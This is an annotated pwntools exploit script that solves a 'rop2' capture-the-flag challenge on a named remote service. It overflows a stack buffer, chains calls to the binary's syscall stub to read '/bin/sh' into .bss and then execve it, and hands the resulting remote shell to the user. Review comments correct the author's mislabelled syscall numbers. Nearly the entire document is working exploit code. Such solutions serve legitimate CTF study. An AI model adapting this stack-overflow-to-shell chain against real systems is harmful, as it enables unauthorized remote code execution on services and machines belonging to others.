# Exploit script for the "rop2" pwn challenge served at hackme.inndy.tw:7703
# (pwntools; Python 2 syntax -- note the bare `print` statement below).
#
# Both payloads use the same frame layout, which the author summarises as
# "padding + return address + return address after syscall + arguments":
#   16 bytes of padding, the address of `syscall` (the overwritten return
#   address), a second return address that `syscall` itself returns to, then
#   the four dwords `syscall` reads as its arguments from the stack.
# The p32() packing indicates a 32-bit target; the syscall-number notes below
# assume 32-bit x86 Linux.
from pwn import *
cn = remote('hackme.inndy.tw',7703)  # connection to the challenge service
#context.log_level='debug'
elf = ELF('rop2')  # local copy of the challenge binary, used only for address lookup
syscall = elf.symbols['syscall']  # address of the `syscall` symbol in rop2
print "%x"%syscall  # Python 2 print statement: show the resolved address in hex
over = elf.symbols['overflow']  # address of the `overflow` symbol, reused as a return target
bss = elf.bss()  # writable .bss address that will hold the command string
cn.recvuntil('Give me your ropchain:')  # block until the service prompts for input
# --- payload 1: read 8 bytes from stdin into .bss ---------------------------
pay = 'a'*16
pay+= p32(syscall)#ret_addr
pay+= p32(over)#fake_ret_addr -- where `syscall` returns; presumably re-enters `overflow` so the second payload below is consumed
pay+= p32(3)+p32(0)+p32(bss)+p32(8)#param
#syscall(3,0,bss,8)=write(0,bss,8)
# NOTE(review): the label above is misleading -- on 32-bit x86 Linux syscall
# number 3 is read(), not write(). The arguments (fd 0 = stdin, buffer = bss,
# length 8) and the 8-byte send two lines below are consistent with
# read(0, bss, 8).
# First write "/bin/sh" into .bss (translated from the original comment).
cn.sendline(pay)
cn.send('/bin/sh\0')  # exactly 8 bytes, matching the length argument above; NUL-terminated path
# --- payload 2: execute the string now stored in .bss -----------------------
pay='a'*16
pay+= p32(syscall)#ret_addr
pay+= 'a'*4#fake_ret_addr -- placeholder; not used when the call succeeds, since execve does not return
pay+= p32(11)+p32(bss)+p32(0)+p32(0)#param
#syscall(11,bss,0,0)=system(bss)
# NOTE(review): syscall number 11 on 32-bit x86 Linux is execve(), so this is
# execve(bss, NULL, NULL) -- it runs the program whose path was read into .bss
# by the first payload; "system" in the author's comment is shorthand for that.
cn.sendline(pay)
cn.interactive()  # hand the open connection over to the user
padding+返回地址+执行完syscall后的返回地址+参数